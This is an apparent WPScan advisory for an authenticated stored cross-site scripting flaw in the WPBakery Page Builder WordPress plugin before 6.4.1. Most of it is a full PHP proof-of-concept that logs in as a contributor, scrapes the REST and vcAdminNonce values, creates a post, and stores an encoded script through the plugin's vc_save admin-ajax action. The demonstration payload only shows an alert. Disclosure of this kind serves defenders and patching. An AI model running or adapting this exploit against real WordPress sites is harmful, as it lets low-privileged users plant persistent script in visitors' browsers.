wpvulndb · Chloe Chamberland · WPVDB-ID: 11285589-1B22-4EC0-ADFC-F2ADD70DB4D7
HistoryOct 07, 2020 - 12:00 a.m.

WPBakery Page Builder < 6.4.1 - Authenticated Stored Cross-Site Scripting (XSS)

2020-10-0700:00:00
Chloe Chamberland
wpscan.com

0.001 Low

EPSS

Percentile

25.0%

Wordfence discovered an Authenticated Stored Cross-Site Scripting (XSS) vulnerability in the WPBakery Page Builder (js_composer) WordPress plugin, fixed in version 6.4.1. It allows a low-privileged authenticated user — a contributor, or any role above it — to inject JavaScript into a post, where it is stored and later executed in the browser of anyone who views that post. The PoC below does this by saving a `[vc_raw_js]` shortcode through the plugin's `vc_save` admin-ajax action; a contributor account normally cannot publish raw script in post content.

PoC

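<?php

declare(strict_types=1);

/*
 * PoC: WPBakery Page Builder (js_composer) < 6.4.1 — authenticated stored XSS.
 *
 * Steps (each one is a request below):
 *   1. log in through wp-login.php as a contributor (or higher); the session
 *      cookie is kept in a temporary cookie jar;
 *   2. scrape the REST nonce from /wp-admin/post-new.php;
 *   3. create a pending post through the REST API and read back its id;
 *   4. open the post with vc_action=vc_inline to scrape vcAdminNonce;
 *   5. save the post through admin-ajax.php?action=vc_save with a [vc_raw_js]
 *      shortcode whose payload is the base64 of the URL-encoded string
 *      <script> alert( "Evil Script Here!" ) </script>.
 *
 * NOTE(review): the listing's header (the <?php tag and the target settings)
 * was lost in extraction. $wp_url, $wp_user and $wp_pass are the only values
 * the script reads that it does not compute itself; fill them in for a host
 * you are authorised to test.
 */
$wp_url  = 'http://TARGET';   // base URL of the WordPress site, no trailing slash
$wp_user = 'contributor';     // any contributor-or-higher account
$wp_pass = 'password';

/**
 * Print a message to stderr, remove the cookie jar (it holds a live
 * WordPress session cookie) and stop.
 *
 * @param string $message   what went wrong
 * @param string $cookiejar path of the cookie jar to delete
 */
function bail(string $message, string $cookiejar): void
{
    fwrite(STDERR, $message . PHP_EOL);
    if (is_file($cookiejar)) {
        unlink($cookiejar);
    }
    exit(1);
}

/**
 * Perform one request with the shared cookie jar and return the response body.
 *
 * @param string     $url       absolute URL
 * @param string     $cookiejar cookie jar path (read and written by curl)
 * @param mixed|null $body      null for GET; an array for a form POST; a string
 *                              for a raw (e.g. JSON) POST body
 * @param string[]   $headers   extra request headers
 * @return string    response body; aborts via bail() on a transport error
 */
function request(string $url, string $cookiejar, $body = null, array $headers = []): string
{
    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_COOKIEJAR      => $cookiejar,
        CURLOPT_COOKIEFILE     => $cookiejar,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_HTTPHEADER     => $headers,
    ]);
    if ($body !== null) {
        // curl derives Content-Length from the body itself; no manual header needed.
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    }
    $out = curl_exec($ch);
    if ($out === false) {
        $err = curl_error($ch);
        curl_close($ch);
        bail("request to $url failed: $err", $cookiejar);
    }
    curl_close($ch);
    return $out;
}

/**
 * Return the first capture group of $pattern in $html, or abort.
 *
 * A missing nonce means the session is not authenticated or the page layout
 * differs; carrying on would only send an empty nonce and get rejected, so
 * stop with a clear message instead of an undefined-index notice.
 *
 * @param string $pattern   PCRE with one capture group
 * @param string $html      page to search
 * @param string $what      human name of the value, for the error message
 * @param string $cookiejar cookie jar to clean up on failure
 */
function scrape(string $pattern, string $html, string $what, string $cookiejar): string
{
    if (preg_match($pattern, $html, $m) !== 1) {
        bail("could not find $what in the response", $cookiejar);
    }
    return $m[1];
}

$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
if ($cookiejar === false) {
    fwrite(STDERR, 'could not create a cookie jar' . PHP_EOL);
    exit(1);
}

// 1) Log in as contributor+. The session cookie lands in $cookiejar.
//    No "rememberme": a PoC has no reason to mint a long-lived cookie.
echo "Logging in!\n";
request($wp_url . '/wp-login.php', $cookiejar, [
    'log'       => $wp_user,
    'pwd'       => $wp_pass,
    'wp-submit' => 'Log+In',
]);

// 2) The REST nonce is embedded in the editor page's inline script.
echo "Grabbing Rest API nonce!\n";
$editor    = request($wp_url . '/wp-admin/post-new.php', $cookiejar);
$restnonce = scrape('/wp\.apiFetch\.createNonceMiddleware\(\s*"([^"]+)"\s*\)/', $editor, 'the REST nonce', $cookiejar);

// 3) Create a pending post and read its id back from the JSON response
//    (json_decode rather than a regex over the JSON text).
echo "Creating New Post and Grabbing Page ID!\n";
$data = [
    'title'   => 'Exploit Post',
    'content' => "\nTest2\n",   // placeholder body; the vc_save call below replaces it
    'status'  => 'pending',
];
$created = request($wp_url . '/wp-json/wp/v2/posts', $cookiejar, json_encode($data), [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $restnonce,   // the REST API wants the nonce alongside the cookie
]);
$decoded = json_decode($created, true);
if (!is_array($decoded) || !isset($decoded['id'])) {
    bail("post creation failed: $created", $cookiejar);
}
$pageid = (string) $decoded['id'];

// 4) Opening the post in WPBakery's inline (front-end) editor mode exposes
//    vcAdminNonce in the page. (The original listing showed "&vc;_action",
//    an HTML-entity artifact of extraction; the parameter is vc_action.)
echo "Grabbing VC Nonce!\n";
$inline  = request($wp_url . '/wp-admin/post.php?post_id=' . $pageid . '&vc_action=vc_inline', $cookiejar);
$vcnonce = scrape("/vcAdminNonce\s*=\s*'([^']+)';/", $inline, 'vcAdminNonce', $cookiejar);

// 5) Save the post through the plugin's admin-ajax handler. [vc_raw_js]
//    carries its script base64-encoded on top of URL-encoding; this is the
//    same value as the literal in the original PoC, spelled out so the
//    reader can see what is stored with the post.
$payload = base64_encode(rawurlencode('<script> alert( "Evil Script Here!" ) </script>'));
echo "XSS'ing!\n";
$result = request($wp_url . '/wp-admin/admin-ajax.php', $cookiejar, [
    'post_id'            => $pageid,
    'vc_inline'          => 'true',
    '_vcnonce'           => $vcnonce,
    'vc_post_custom_css' => '',
    'action'             => 'vc_save',
    'content'            => "\n[vc_row][vc_column][vc_raw_js]" . $payload . '[/vc_raw_js][/vc_column][/vc_row]',
]);
print_r($result);

// The jar holds a valid WordPress session cookie; do not leave it on disk.
unlink($cookiejar);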

CPE Name | Operator | Version
js_composer | < | 6.4.1

